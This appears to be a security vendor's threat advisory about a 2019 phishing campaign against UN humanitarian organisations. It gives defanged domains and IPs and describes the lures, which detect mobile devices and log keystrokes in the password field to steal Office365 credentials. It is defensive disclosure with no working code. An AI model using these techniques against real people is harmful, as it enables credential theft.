October 14, 2019

Phishing Attack Targeting UN Discovered by Lookout Phishing AI

United nations building with united nation flags in the background.
Entry Type
Threat Summary
Threat Type
Phishing
Platform(s) Affected
Threat Summary
Phishing

Lookout Phishing AI has detected a mobile-aware phishing campaign targeting non-governmental organizations around the world, including a variety of United Nations humanitarian organizations, such as UNICEF. Lookout has contacted law enforcement and the targeted organizations, but as of the publication of this blog the attack is still ongoing.                     

Background on the phishing campaign

The infrastructure connected to this attack has been live since March 2019. Two domains have been hosting phishing content, session-services[.]com and service-ssl-check[.]com, which resolved to two IPs over the course of this campaign: 111.90.142.105 and 111.90.142.91. The associated IP network block and ASN (Autonomous System Number) is understood by Lookout to be of low reputation and is known to have hosted malware in the past.

Mobile-Aware functionality and key logging

Lookout has identified several noteworthy techniques employed in this campaign, including its ability to detect mobile devices and to log keystrokes directly as they are entered in the password field.

Specifically, Javascript code logic on the phishing pages detects if the page is being loaded on a mobile device and delivers mobile-specific content in that case. Mobile web browsers also unintentionally help obfuscate phishing URLs by truncating them, making it harder for the victims to discover the deception.

Lookout has also collected evidence of key logging functionality embedded in the password field of the phishing login pages, such that, if a target doesn’t complete the login activity by pressing the login button or if they enter another, unintended password, this information is still sent back to the command and control infrastructure operated by the malicious actor.

SSL certificates and humanitarian aid domains

All major browsers will alert users about the use of expired SSL certificates. As these warnings are very clear (and in fact often hard to dismiss) it would be near impossible to entice a user to enter their login credentials on a site that uses an expired certificate. As a result, expired SSL certificates observed on some of the phishing sites can provide insight into the time period of the attack.

SSL certificates used by the phishing infrastructure had two main ranges of validity: May 5, 2019 to August 3, 2019, and June 5, 2019 to September 3, 2019. Currently six certificates are still valid, and Lookout suspects that these attacks may still be ongoing. A table at the end of this blog shows the targeted organizations, the URLs targeting them as well as whether the current SSL certificate on the site is valid as of writing this report.

A sample of one of the live phishing sites discovered by Lookout researchers. Top: The legitimate login page targeted by this phishing attack. Bottom: The phishing site mimicking the legitimate Office365 login page for employees of the International Federation of Red Cross and Red Crescent Societies.

Lookout Phishing and Content Protection

The mobile-aware component found in this campaign is further proof that phishing attacks have evolved to target mobile devices. Mobile phishing has emerged as a source of increasing risk for enterprises, as the post-perimeter world and widespread adoption of bring your own device (BYOD) policies blurs the lines between personal devices and corporate networks, not to mention the expanded multi-channel threat surface presented by such devices and mobility as a whole.

Lookout Phishing & Content Protection goes beyond traditional phishing channels and detects phishing attacks from all types of sources, including personal and corporate email, social media, SMS and other messaging and apps. Lookout also detects access to malicious sites, including malware and spyware distribution, command and control servers, and botnets — from URLs delivered by any app or channel on a user’s device.

Colleagues standing in an open meeting area and sharing a humorous moment

Stop Cyberattacks Before They Start With Industry-Leading Threat Intelligence.

Other Related Threats

New

September 15, 2023

Scattered Spider

Scattered Spider, aka UNC3944, was able to successfully target and gain access to the infrastructure of Caesars Entertainment in its latest campaign

January 3, 2023

How Scammers Are Impersonating Singapore Post and Singtel With Phishing Messages

November 30, 2022

Lookout Discovers Hundreds of Predatory Loan Apps on Google Play and Apple App Store